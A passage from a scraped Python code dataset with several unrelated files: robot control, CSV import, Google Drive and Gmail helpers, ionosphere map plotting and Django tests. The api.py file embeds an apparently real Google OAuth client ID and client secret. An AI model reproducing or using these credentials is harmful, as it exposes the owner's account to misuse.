Account.query.filter(Account.id == id).first()\n\n super().validate_user_permission_on_result(account, Account, 'user_id')\n\n db.session.delete(account)\n db.session.commit()\n\n return account\n","sub_path":"app/main/service/account_service.py","file_name":"account_service.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"605055114","text":"from rest_framework import serializers\nfrom .models import Render\n\n\nclass RenderSerializer(serializers.ModelSerializer):\n output_url = serializers.CharField(source='get_output_url', read_only=True)\n\n class Meta:\n model = Render\n fields = ('id', 'source_type', 'source_id', 'created_at', 'state', 'output_url', 'logs')\n read_only_fields = ('id', 'created_at', 'state', 'output_url', 'logs')\n","sub_path":"arxiv_html/renders/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"291927349","text":"#!/usr/bin/env python3\n# (MicroPython does not yet support Display as of 2020)\n\n\nfrom ev3dev.ev3 import (\n Motor, LargeMotor, MediumMotor, OUTPUT_A, OUTPUT_B, OUTPUT_C, \n InfraredSensor, INPUT_4,\n Screen, Sound\n)\n\nfrom PIL import Image\nfrom time import sleep\n\n\nMEDIUM_MOTOR = MediumMotor(address=OUTPUT_A)\nLEFT_MOTOR = LargeMotor(address=OUTPUT_B)\nRIGHT_MOTOR = LargeMotor(address=OUTPUT_C)\n\nIR_SENSOR = InfraredSensor(address=INPUT_4)\n\nSCREEN = Screen()\nSPEAKER = Sound()\n\n\nMEDIUM_MOTOR.run_timed(\n speed_sp=-200, # deg/s\n time_sp=1000, # ms \n stop_action=Motor.STOP_ACTION_HOLD)\nMEDIUM_MOTOR.wait_while(Motor.STATE_RUNNING)\n\n\nwhile True:\n if IR_SENSOR.proximity < 25:\n SCREEN.image.paste(im=Image.open('/home/robot/image/Pinch right.bmp'))\n SCREEN.update()\n\n LEFT_MOTOR.run_to_rel_pos(\n speed_sp=750, # degrees/second\n position_sp=-1000, # degrees\n stop_action=Motor.STOP_ACTION_HOLD)\n RIGHT_MOTOR.run_to_rel_pos(\n speed_sp=750, # degrees/second\n position_sp=1000, # degrees\n stop_action=Motor.STOP_ACTION_HOLD)\n LEFT_MOTOR.wait_while(Motor.STATE_RUNNING)\n RIGHT_MOTOR.wait_while(Motor.STATE_RUNNING)\n\n SCREEN.image.paste(im=Image.open('/home/robot/image/Angry.bmp'))\n SCREEN.update()\n \n MEDIUM_MOTOR.run_timed(\n speed_sp=1000, # deg/s\n time_sp=0.3 * 1000, # ms \n stop_action=Motor.STOP_ACTION_HOLD)\n MEDIUM_MOTOR.wait_while(Motor.STATE_RUNNING)\n\n SPEAKER.play(wav_file='/home/robot/sound/Laughing 2.wav').wait()\n\n MEDIUM_MOTOR.run_timed(\n speed_sp=-200, # deg/s\n time_sp=1000, # ms \n stop_action=Motor.STOP_ACTION_HOLD)\n MEDIUM_MOTOR.wait_while(Motor.STATE_RUNNING)\n\n else:\n SCREEN.image.paste(im=Image.open('/home/robot/image/Crazy 1.bmp'))\n SCREEN.update()\n \n LEFT_MOTOR.run_forever(speed_sp=750)\n RIGHT_MOTOR.run_forever(speed_sp=750)\n\n MEDIUM_MOTOR.run_timed(\n speed_sp=750, # deg/s\n time_sp=0.1 * 1000, # ms \n stop_action=Motor.STOP_ACTION_HOLD)\n MEDIUM_MOTOR.wait_while(Motor.STATE_RUNNING)\n\n sleep(0.1)\n\n SCREEN.image.paste(im=Image.open('/home/robot/image/Crazy 2.bmp'))\n SCREEN.update()\n\n # LEFT_MOTOR.run_forever(speed_sp=750)\n RIGHT_MOTOR.stop(stop_action=Motor.STOP_ACTION_HOLD)\n\n MEDIUM_MOTOR.run_timed(\n speed_sp=-300, # deg/s (-100 too soft)\n time_sp=0.2 * 1000, # ms \n stop_action=Motor.STOP_ACTION_COAST)\n MEDIUM_MOTOR.wait_while(Motor.STATE_RUNNING)\n","sub_path":"Computing-Platforms/EV3/Home-Edition/Core-Robots/Track3r/Track3r-4.EV3Dev1.py","file_name":"Track3r-4.EV3Dev1.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"153550038","text":"\n#!/usr/bin/env python3.4\n# ---------------------------------------------------------------------------- #\nimport os, glob, sqlite3, subprocess, Constants\nimport pandas as pd\nfrom pandas.io import sql\nfrom tqdm import tqdm\n# ---------------------------------------------------------------------------- #\nos.chdir('../../../../Desktop/')\nCSVFiles = glob.glob('*.csv')\n# ---------------------------------------------------------------------------- #\ntable_name = 'Premierworks' # name table\nitersize = 100000 # number of lines to process at each iteration\n# ---------------------------------------------------------------------------- #\ndef CSVtoSQLiteImport():\n for file in CSVFiles:\n CSVLineCount = subprocess.check_output(['wc','-l',file])\n CSVLineCount = int(CSVLineCount.split()[0])\n filename = file.strip('.csv')\n ConSQLiteDB = sqlite3.connect('{}_SQLite3.db'.format(filename))\n for row in tqdm(range(1,CSVLineCount,itersize)):\n DataFrame = pd.read_csv(\n file,\n header = None,\n nrows = itersize,\n skiprows = row,\n low_memory = False\n )\n DataFrame.columns = Constants.HeaderRowMain\n sql.to_sql(\n DataFrame,\n name = table_name,\n con = ConSQLiteDB,\n index = False,\n index_label = 'CustomerID',\n if_exists = 'append'\n )\n ConSQLiteDB.close()\n\nif __name__ == '__main__':\n CSVtoSQLiteImport()\n","sub_path":"ImportCSVtoSQLite.py","file_name":"ImportCSVtoSQLite.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"186951062","text":"from google.oauth2 import service_account\nfrom googleapiclient.http import MediaIoBaseDownload, MediaFileUpload\nfrom googleapiclient.discovery import build\nimport io\nimport pickle\nimport requests\nimport os\nimport os.path\nimport platform\nimport mimetypes\nimport base64\nfrom apiclient import errors\nfrom email.mime.text import MIMEText\nfrom email.mime.image import MIMEImage\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.base import MIMEBase\nimport pprint as pp\nimport json\nimport datetime\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\n\nSCOPES = ['https://www.googleapis.com/auth/drive',\n 'https://www.googleapis.com/auth/gmail.send']\nSERVICE_ACCOUNT_FILE = 'Emotions_Project-481579272f6a.json'\nEMAIL_ACCOUNT_FILE = 'email_credentials.json'\nNVR_ACCOUNT_FILE = 'nvr_cred.json'\nnvr_server = 'https://nvr.miem.hse.ru/api/gdrive-upload'\nnvr_key = 'https://nvr.miem.hse.ru/api/gdrive-upload/504'\nGOOGLE_DISCOVERY_URL = \"https://accounts.google.com/.well-known/openid-configuration\"\nGOOGLE_CLIENT_ID = '332884163839-cgsk3ta79lgoo2o2otcb2h8ck28cd1if.apps.googleusercontent.com'\nGOOGLE_CLIENT_SECRET = 'bIb1mKNZH18LC5lSeDj1QTMk'\n\nEMAIL_FROM = \"noreply@facerecognizer.com\"\n\ncredentials = None\nservice = None\n# credentials = service_account.Credentials.from_service_account_file(SERVICE_ACCOUNT_FILE, scopes=SCOPES)\n# # email_cred = service_account.Credentials.from_service_account_file(EMAIL_ACCOUNT_FILE, scopes=SCOPES)\n# service = build('drive', 'v3', credentials=credentials)\n# with open('Emotions_Project-481579272f6a.json', 'r') as j:\n# data = json.load(j)\n\n\n# delegated_credentials = credentials.with_subject(EMAIL_FROM)\n# service = build('gmail', 'v1', credentials=delegated_credentials)\n\n# credentials = service_account.Credentials.from_service_account_file(NVR_ACCOUNT_FILE, scopes=SCOPES)\n# service = build('drive', 'v3', credentials=credentials)\n\n\ndef look_into_drive(dict_id, name_contains=None):\n if name_contains is None:\n return service.files().list(pageSize=100,\n fields=\"nextPageToken, files(id, name, mimeType, parents, createdTime, permissions, quotaBytesUsed)\",\n q=\"'\" + dict_id + \"' in parents\").execute()\n return service.files().list(pageSize=100,\n fields=\"nextPageToken, files(id, name, mimeType, parents, createdTime, permissions, quotaBytesUsed)\",\n q=\"'\" + dict_id + \"' in parents and name contains '\" + name_contains + \"'\").execute()\n\n\ndef download_video_nvr(room, date, time, filename=None, need_folder=False):\n try:\n rooms = pickle.loads(open(\"rooms.pickle\", \"rb\").read())\n except:\n raise Exception(\"No file containing rooms' ids\")\n room_id = rooms[room][0]\n tag = rooms[room][1]\n results = look_into_drive(room_id, date)\n if len(results['files']) > 1:\n raise Exception(\"More then one directory on Google drive\")\n elif len(results['files']) == 0:\n raise Exception(\"No files found on drive\")\n time_id = results['files'][0]['id']\n results = look_into_drive(time_id, time)\n if len(results['files']) > 1:\n raise Exception(\"More then one directory on Google drive\")\n elif len(results['files']) == 0:\n raise Exception(\"No files found on drive\")\n if tag is not None:\n results = look_into_drive(results['files'][0]['id'], date + \"_\" + time + \"_\" + room + \"_\" + tag)\n if filename is None:\n [hour, minute] = time.split(\":\")\n filename = \"queue/\" + date + \"_\" + hour + \"-\" + minute + \"_\" + room + \"_\" + tag + \".mp4\"\n if len(results['files']) > 1:\n raise Exception(\"More then one file on Google drive\")\n elif len(results['files']) == 0:\n raise Exception(\"No files found on drive\")\n request = service.files().get_media(fileId=results['files'][0]['id'])\n fh = io.FileIO(filename, 'wb')\n downloader = MediaIoBaseDownload(fh, request)\n done = False\n while not done:\n status, done = downloader.next_chunk()\n print(\"Download process is %d%%. \" % int(status.progress() * 100))\n\n if need_folder:\n return filename, results['files'][0]['parents']\n else:\n return filename\n\n\ndef upload_video(filename, upload_name, folder_id=None, room_num=None):\n if folder_id is not None:\n file_metadata = {'name': upload_name, 'parents': [folder_id]}\n media = MediaFileUpload(filename, resumable=True)\n r = service.files().create(body=file_metadata, media_body=media, fields='id').execute()\n print(r)\n return r\n elif room_num is not None:\n if platform.system() != \"Windows\":\n old_string = filename\n _dir, old_string = old_string.split(\"/\")\n old_string = old_string.split(\".\")[0]\n d = datetime.datetime.strptime(old_string, \"%Y-%m-%d_%H-%M\")\n new_string = _dir + \"/\" + d.strftime(\"%Y-%m-%d_%H:%M\") + \".mp4\"\n os.rename(filename, new_string)\n filename = new_string\n file = open(filename, 'rb')\n files = {'file': file}\n res = requests.post(nvr_server + \"/\" + room_num, files=files, headers=nvr_key)\n\n return res.status_code\n\n\ndef edit_rooms(rooms, ids, tags):\n staff = zip(ids, tags)\n staff = dict(zip(rooms, staff))\n f = open(\"rooms.pickle\", \"wb\")\n f.write(pickle.dumps(staff))\n\n\ndef create_message(sender, to, subject, message_text, file=None):\n message = MIMEMultipart()\n message['to'] = to\n message['from'] = sender\n message['subject'] = subject\n\n msg = MIMEText(message_text)\n message.attach(msg)\n\n if file is not None:\n content_type, encoding = mimetypes.guess_type(file)\n\n if content_type is None or encoding is not None:\n content_type = 'application/octet-stream'\n main_type, sub_type = content_type.split('/', 1)\n if main_type == 'text':\n fp = open(file, 'rb')\n msg = MIMEText(fp.read(), _subtype=sub_type)\n fp.close()\n elif main_type == 'image':\n fp = open(file, 'rb')\n msg = MIMEImage(fp.read(), _subtype=sub_type)\n fp.close()\n elif main_type == 'audio':\n fp = open(file, 'rb')\n msg = MIMEAudio(fp.read(), _subtype=sub_type)\n fp.close()\n else:\n fp = open(file, 'rb')\n msg = MIMEBase(main_type, sub_type)\n msg.set_payload(fp.read())\n fp.close()\n filename = os.path.basename(file)\n msg.add_header('Content-Disposition', 'attachment', filename=filename)\n message.attach(msg)\n\n return {'raw': base64.urlsafe_b64encode(message.as_string().encode()).decode()}\n\n\ndef send_message(user_id, message):\n \"\"\"Send an email message.\n Args:\n service: Authorized Gmail API service instance.\n user_id: User's email address. The special value \"me\"\n can be used to indicate the authenticated user.\n message: Message to be sent.\n Returns:\n Sent Message.\n \"\"\"\n try:\n service = get_service('token.pickle')\n message = (service.users().messages().send(userId=user_id, body=message).execute())\n print('Message Id: %s' % message['id'])\n return message\n\n except errors.HttpError as error:\n print('An error occurred: %s' % error)\n\n\ndef build_service():\n \"\"\"Shows basic usage of the Gmail API.\n Lists the user's Gmail labels.\n \"\"\"\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n f\"{EMAIL_ACCOUNT_FILE}\", SCOPES)\n creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('gmail', 'v1', credentials=creds)\n return service\n\n\ndef get_service(path):\n with open(rf'{path}', 'rb') as token:\n creds = pickle.load(token)\n service = build('gmail', 'v1', credentials=creds)\n return service\n\n\ndef send_file_with_email(to:str, subject:str, message_text, file=None):\n # email_service = get_service('token.pickle')\n message = create_message(EMAIL_FROM, to, subject, message_text, file)\n send_message('me', message)\n\n\ndef get_google_provider_cfg():\n return requests.get(GOOGLE_DISCOVERY_URL).json()\n\n\n# send_file_with_email('iasizykh@miem.hse.ru', 'Test', 'Test')\n# build_service()\n\n# message = create_message(EMAIL_FROM, 'iasizykh@miem.hse.ru', 'Test', 'Testment')\n# send_message('me', message)\n# pp = pp.PrettyPrinter(indent=4)\n\n# r = upload_video(\"video_output/twice.mp4\", \"twice.mp4\", folder_id=\"14Xsw4xk6vUFINsyy1OH5937Rq98W4JHw\")\n# print(r)\n# now = datetime.datetime.now()\n# today = now.strftime('%Y-%m-%d')\n#\n# filename, results = download_video_nvr('504', '2020-07-12', '12:00')\n# results = upload_video('1zAPs-2GP_SQj6tHLWwgohjuwCS_7o3yu', 'Webcam.mp4')\n# pp.pprint(results)\n\n\n# rooms = ['504', '520', '305', '505a', '307', '306']\n# ids = ['1zAPs-2GP_SQj6tHLWwgohjuwCS_7o3yu', '1hjRds9U673yqZq6sjPuoLT3R0-zzr-B3', '1i3j8a60gk-RtX6vS3md8q98xtbc5VSk-',\n# '14JWOQs_dW8aIHpQZfO-KQ9HKQVqrwLN9', '1qZNnDJpIBZI52CcEcwAJP69QR9LyIPi2', '1INi7xUvLhPJW0as3HO8ugdCgsO-HwfxB']\n# tags = ['26', None, '54', None, None, None]\n# edit_rooms(rooms, ids, tags)\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"89050081","text":"#!/usr/bin/env python3\n\"\"\" FastText \"\"\"\nfrom gensim.models import FastText\n\n\ndef fasttext_model(sentences, size=100, min_count=5, negative=5,\n window=5, cbow=True, iterations=5, seed=0, workers=1):\n \"\"\" creates and trains a gensim word2vec model.\n Args:\n sentences: (list) list of sentences to be trained on.\n size: (int) the dimensionality of the embedding layer.\n min_count: (int) the minimum number of occurrences\n of a word for use in training.\n negative: the size of negative sampling.\n window: (int) the maximum distance between the current\n and predicted word within a sentence.\n cbow: (bool) a boolean to determine the training type;\n True is for CBOW; False is for Skip-gram.\n iterations: (int) the number of iterations to train over.\n seed: (int) the seed for the random number generator.\n workers: (int) the number of worker threads to train the model.\n Returns:\n the trained model.\n \"\"\"\n if cbow:\n sg = 0\n else:\n sg = 1\n model = FastText(sentences=sentences, size=size, min_count=min_count,\n window=window, negative=negative, sg=sg,\n iter=iterations, seed=seed, workers=workers)\n model.train(sentences, total_examples=model.corpus_count,\n epochs=model.epochs)\n\n return model\n","sub_path":"supervised_learning/0x0F-word_embeddings/4-fasttext.py","file_name":"4-fasttext.py","file_ext":"py","file_size_in_byte":1477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"129551431","text":"#!/usr/bin/env python3\n\n'''\nWritten by Lucas J. Hyland 2021/09/21\nUniversity of Tasmania, Australia\n'''\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport struct, os, math, random, matplotlib, datetime, argparse, difflib\nfrom matplotlib import rc, font_manager\nfrom numpy import pi, arcsin, cos, sin, percentile, exp\n\nfrom mpl_toolkits.basemap import Basemap\n\nfrom astropy.time import Time\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\n\nimport matplotlib.animation as animation\n\n\nmatplotlib.rcParams.update({'font.size': 14})\nrc('font',**{'family':'serif','serif':['Computer Modern Roman']})\nrc('text', usetex=True)\n\n##############################################################################################\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-v\", \"--verbose\",\n help=\"increase output verbosity\",\n action=\"count\",default=0)\n parser.add_argument('tec_map',\n help='jplg TEC map e.g. jplgDDD0.YYi',\n type=str)\n parser.add_argument('-m','--maser',\n help='Maser number or name e.g. G232.62 or s1',default='G232.62')\n parser.add_argument('-l','--lower',\n help='Lowest TEC to show', type=float,default=-2)\n parser.add_argument('-u','--upper',\n help='Highest TEC to show', type=float,default=40)\n parser.add_argument('-R','--rms',\n help='Do RMS instead of total', action=\"count\",default=0)\n args = parser.parse_args()\n\n '''\n Load in specified TEC map. Only can load in one at a time atm.\n '''\n t, longi, lati, tec, rms = read_jpltec(args.tec_map)\n '''\n Get maser of interest. Defaults to G232.62 aka s1 at the moment.\n '''\n maser = get_maser(args.maser)\n source = SkyCoord(ra=maser.ra,dec=maser.dec,unit=(u.hourangle,u.deg))\n gst = 15*t.sidereal_time('apparent').value\n \n # deletes old animations if they exist (they shouldn't)\n try:\n animate1.event_source.stop()\n except NameError:\n ''\n '''\n Makes basemap of Australia-NZ area. Currently hard-coded.\n '''\n x, y = np.meshgrid(longi, lati)\n fig, ax = plt.subplots(1,figsize=(14,7))\n ax = Basemap(llcrnrlon=70.,llcrnrlat=-66.,urcrnrlon=220.,urcrnrlat=5.,\\\n rsphere=(6378137.00,6356752.3142),\\\n resolution='l',projection='merc',ax=ax)\n ax.drawcoastlines()\n ax.drawstates()\n ax.drawparallels(np.arange(-90,90,10),labels=[1,1,0,1]);\n ax.drawmeridians(np.arange(-180,180,15),labels=[1,1,0,1]);\n '''\n Put antenna locations on map. Currently hard-coded for WASCI\n '''\n ant_lat = [-42.804,-31.868,-29.047,-14.375,-36.43]\n ant_lon = [147.440,133.809,115.350,132.150,174.66]\n col = ['g','orange','b','r','y']\n for i in range(len(ant_lat)):\n ax.scatter(ant_lon[i],ant_lat[i],latlon=True,color=col[i],zorder=99)\n '''\n Put on axis objects- 0:TEC colormap, 1:source position, 2:date/time, \n 3:antenna-source LoS (W.I.P) and colorbar (fixed -2 to 40)\n '''\n m = 0\n if args.rms>0:\n plot0 = [ax.pcolor(x,y,rms[:,:,m], latlon=True,cmap='magma',vmin=args.lower,vmax=args.upper)]\n else:\n plot0 = [ax.pcolor(x,y,tec[:,:,m], latlon=True,cmap='magma',vmin=args.lower,vmax=args.upper)]\n\n plot1 = [ax.scatter([source.ra.deg-gst[m]],[source.dec.deg],latlon=True,color='w',s=50,zorder=99)]\n plot2 = [fig.text(0.175,0.15,s=f'{t.iso[m]}',color='w',size=12)]\n plot3 = []\n #for i in range(len(a_lat)):\n # plot3.append(ax.drawgreatcircle(a_lon[i],a_lat[i],\n # source.ra.deg-gst[m],source.dec.deg,color='w',ls='-.',lw=0.25))\n c = plot0[0]\n if args.rms>0: ax.colorbar(c,pad='8%',label=R'$I_e$ (TECU)')\n else: ax.colorbar(c,pad='8%',label=R'$\\delta I_e$ (TECU)')\n '''\n Create animation. \n '''\n if args.rms>0:\n animate1 = animation.FuncAnimation(fig, update, range(tec.shape[2]), \n fargs=(t,gst,source,x,y,rms,plot0,plot1,plot2,plot3,fig,ax,args),interval=500)\n else:\n animate1 = animation.FuncAnimation(fig, update, range(tec.shape[2]), \n fargs=(t,gst,source,x,y,tec,plot0,plot1,plot2,plot3,fig,ax,args),interval=500) \n plt.show()\n\n##############################################################################################\n\ndef get_file(path):\n #opens and external file and makes it into a list\n fopen = path\n f=open(fopen, 'r+')\n g=list(f)\n g=map(lambda s: s.strip(), g)\n return np.array(list(g))\n\ndef splitt(old_list):\n #splits the list entries into sublists\n new_list=[]\n for i in old_list:\n new_list+=[i.split()]\n return new_list\n\nclass Maser:\n kind = 'maser' \n def __init__(self, name, ra, dec, vel, flux, alias):\n self.name = name \n self.ra = ra\n self.dec = dec\n self.vel = float(vel)\n self.cflux = float(flux)\n self.alias = alias\n\ndef get_maser(template):\n masers = np.array([\n ['G232.620+0.996','07:32:09.79','-16:58:12.4', 22.9, 11.5,'s1' ],\n ['G287.371+0.644','10:48:04.44','-58:27:01.0', -1.9, 21.9,'s3' ],\n ['G309.921+0.479','13:50:41.78','-61:35:10.2',-57.9, 57.6,'s4' ],\n ['G323.740-0.263','15:31:45.45','-56:30:50.1',-50.4,346.6,'s5' ],\n ['G327.402+0.445','15:49:19.50','-53:45:13.9',-82.9, 37.7,'s6' ],\n ['G328.254-0.532','15:57:59.75','-53:58:00.4',-36.8, 20.9,'s7' ],\n ['G328.808+0.633','15:55:48.45','-52:43:06.6',-44.4, 30.6,'s8' ],\n ['G339.622-0.121','16:46:05.99','-45:36:43.3',-33.2, 23.3,'s9' ],\n ['G339.884-1.259','16:52:04.67','-46:08:34.2',-35.6,424.1,'s10'],\n ['G345.505+0.348','17:04:22.91','-40:44:21.7',-14.1, 24.5,'s11'],\n ['G291.274-0.709','11:11:53.35','-61:18:23.7',-30.7, 10.7,'s14'],\n ['G299.772-0.005','12:23:48.97','-62:42:25.3', -6.7, 12.3,'s15'],\n ['G318.948-0.196','15:00:55.40','-58:58:52.1',-36.3, 12.5,'s16'],\n ['G326.475+0.703','15:43:16.64','-54:07:14.6',-38.4, 13.5,'s17'],\n ['G328.237-0.547','15:57:58.28','-53:59:22.7',-44.7, 41.9,'s18'],\n ['G329.029-0.205','16:00:31.80','-53:12:49.6',-36.1, 11.1,'s19'],\n ['G332.295+2.280','16:05:41.72','-49:11:30.3',-23.7, 10.5,'s20'],\n ['G337.920-0.456','16:41:06.05','-47:07:02.5',-38.6, 12.7,'s21'],\n ['G345.010+1.792','16:56:47.58','-40:14:25.8',-17.0, 14.2,'s22'],\n ['G348.550-0.979','17:19:20.41','-39:03:51.6',-10.4, 10.5,'s23'],\n ['G352.630-1.067','17:31:13.91','-35:44:08.7', -3.3, 17.6,'s24']])\n try:\n match = difflib.get_close_matches(template, masers[:,0])[0]\n index = masers[:,0]==match\n return Maser(*masers[index,:][0])\n except IndexError:\n try: \n match = difflib.get_close_matches(template, masers[:,-1])[0]\n index = masers[:,-1]==match\n return Maser(*masers[index,:][0])\n except IndexError:\n print('Cannot identify maser, defaulting to G232.62')\n return Maser(*masers[0,:])\n\ndef update(m,t,gst,source,x,y,mapp,plot0,plot1,plot2,plot3,fig,ax,args):\n plot0[0].remove()\n plot0[0] = ax.pcolor(x,y,mapp[:,:,m], latlon=True,cmap='magma',vmin=args.lower,vmax=args.upper)\n plot1[0].remove()\n plot1[0] = ax.scatter([source.ra.deg-gst[m]],[source.dec.deg],latlon=True,color='w',s=50,zorder=99)\n plot2[0].remove()\n plot2[0] = fig.text(0.175,0.15,s=f'{t.iso[m]}',color='w',size=12)\n #for ln in plot3: ln[0].remove()\n #for i in range(len(a_lat)):\n # plot3.append(ax.drawgreatcircle(a_lon[i],a_lat[i],\n # source.ra.deg-gst[m],source.dec.deg,color='w',ls='-.',lw=0.25))\n\n\ndef read_jpltec(tec_loc):\n tecfile = get_file(tec_loc)\n start = [s for s in tecfile if 'HEADER' in s][0]\n tecends = [s for s in tecfile if 'END OF TEC MAP' in s]\n rmsends = [s for s in tecfile if 'END OF RMS MAP' in s]\n header = tecfile[:np.where(tecfile==start)[0][0]-1]\n data = tecfile[ np.where(tecfile==start)[0][0]+1:np.where(tecfile==tecends[-1])[0][0]]\n rdat = tecfile[ np.where(tecfile==tecends[-1])[0][0]+1:np.where(tecfile==rmsends[-1])[0][0]]\n\n # read tec map\n tecstart = np.array([np.where(data==s)[0][0] for s in data if 'START OF TEC MAP' in s])\n lat = []\n for m in range(len(tecstart)):\n tmap = data[tecstart[m]+1:tecstart[m]+428]\n\n # read rms map\n rmsstart = np.array([np.where(rdat==s)[0][0] for s in rdat if 'START OF RMS MAP' in s])\n for m in range(len(rmsstart)):\n rmap = data[rmsstart[m]+1:rmsstart[m]+428]\n\n t, lat, long = [], np.arange(87.5,-87.6,-2.5), np.arange(-180,180.1,5)\n tec = np.zeros(shape=(len(lat),len(long),12))\n rms = np.zeros(shape=(len(lat),len(long),12))\n for m in range(12):\n # format tec map\n tmap = data[tecstart[m]+1:tecstart[m]+428]\n time_string = tmap[0].split()\n map_t = datetime.datetime(year=int(time_string[0]),month=int(time_string[1]),day=int(time_string[2]),\n hour=int(time_string[3]),minute=int(time_string[4]),second=int(time_string[5]))\n latstart = np.array([np.where(tmap==s)[0][0] for s in tmap if 'LAT/LON1/LON2/DLON/H' in s])\n for n in range(len(lat)):\n tec[n,:,m] = np.array([s for d in splitt(tmap[latstart[n]+1:latstart[n]+6]) for s in d],dtype='float')\n ####################################################\n rmap = rdat[rmsstart[m]+1:rmsstart[m]+428]\n rlatstar = np.array([np.where(rmap==s)[0][0] for s in rmap if 'LAT/LON1/LON2/DLON/H' in s])\n for n in range(len(lat)):\n rms[n,:,m] = np.array([s for d in splitt(rmap[rlatstar[n]+1:rlatstar[n]+6]) for s in d],dtype='float')\n t.append(map_t)\n return Time(t,location=('0d', '0d')), long, lat, tec*0.1, rms*0.1\n\n##############################################################################################\n\nif __name__=='__main__':\n main()\n\n##############################################################################################\n\n","sub_path":"testing/plot_jpltec.py","file_name":"plot_jpltec.py","file_ext":"py","file_size_in_byte":10131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"18359845","text":"import subprocess\nimport multiprocessing\nfrom time import ctime\n\ndef appium_start(host,port):\n bootstrap_port=port+2\n cmd=\"start /b appium -p\"+str(port)+\"-bp\"+str(bootstrap_port)\n\n print(\"%s at %s\" %(cmd,ctime()))\n subprocess.Popen(cmd,shell=True,stdout=open(\"./appium_log/prot\"+str(port)+\".log\",\"a\"),stderr=subprocess.STDOUT)\n\n\nappium_process=[]\nhost=\"127.0.0.1\"\nport=4723\nfor i in range(2):\n #启动进程\n process=multiprocessing.Process(target=appium_start,args=(host,port+2*i))\n #把进程放进进程组\n appium_process.append(process)\n\nif __name__ == '__main__':\n for p in appium_process:\n p.start()\n for p in appium_process:\n p.join()\n","sub_path":"appium_sync/multi_appium_sync.py","file_name":"multi_appium_sync.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"38832728","text":"from datetime import datetime\nimport random\nimport string\n\nfrom django.test import TestCase\n\nfrom corehq.apps.commtrack.models import NewStockReport\n\nfrom casexml.apps.stock.const import REPORT_TYPE_BALANCE\nfrom casexml.apps.stock.models import StockReport\nfrom couchforms.models import XFormInstance\n\n\nDOMAIN_MAX_LENGTH = 25\n\n\nclass StockReportDomainTest(TestCase):\n def _get_name_for_domain(self):\n return ''.join(\n random.choice(string.ascii_lowercase)\n for _ in range(DOMAIN_MAX_LENGTH)\n )\n\n def setUp(self):\n self.domain = self._get_name_for_domain()\n self.form = XFormInstance(domain=self.domain)\n self.form.save()\n self.new_stock_report = NewStockReport(\n self.form,\n datetime.now(),\n REPORT_TYPE_BALANCE,\n [],\n )\n\n def tearDown(self):\n self.form.delete()\n StockReport.objects.all().delete()\n\n def test_stock_report(self):\n self.new_stock_report.create_models()\n filtered_stock_report = StockReport.objects.filter(domain=self.domain)\n self.assertEquals(filtered_stock_report.count(), 1)\n stock_report = filtered_stock_report.get()\n self.assertEquals(stock_report.form_id, self.form._id)\n self.assertEquals(stock_report.domain, self.domain)\n","sub_path":"corehq/apps/commtrack/tests/test_stock_report.py","file_name":"test_stock_report.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"131750110","text":"# script to store normalized percentage change (percentage change / max percentage change over 2 years) of S&P 500 index for each day\n\nimport csv\nfile_data=[]\nmax=0.0\nmin=0.0\nwith open('../Data/GSPC_RAW_change_1.csv','r') as csv_file:\n csv_reader = csv.reader(csv_file, delimiter = ',')\n for row in csv_reader:\n if(float(row[5])>0.0):\n if(float(row[5])>max):\n max=float(row[5])\n if(float(row[5])<0.0):\n if(float(row[5])0.0):\n file_data[i][6] = float(file_data[i][5]) / max\n else:\n file_data[i][6] = float(file_data[i][5]) / min\n\n# print(file_data)\n\nwith open('../Data/GSPC_RAW_change_1.csv','w') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter = ',')\n csv_writer.writerows(file_data)\n\ncsv_file.close()","sub_path":"src/script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"623520633","text":"import tkinter as tk\nfrom tkinter.messagebox import *\n\nroot = tk.Tk()\nlb = tk.Listbox(root)\nsl = tk.Scrollbar(root)\nsl.pack(side = 'right', expand = 'yes', fill = 'y')\nlb['yscrollcommand'] = sl.set\nfor i in range(100):\n lb.insert('end', str(i))\nlb.pack(side = 'left', expand = 'yes')\nsl['command'] = lb.yview\nroot.mainloop()","sub_path":"python/Python review/gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"19782245","text":"N = int(input(''))\ncycle = 0\nnew = N\nwhile True:\n a = new//10\n b = new % 10\n c = (a+b) % 10\n new = 10 * b + c\n cycle 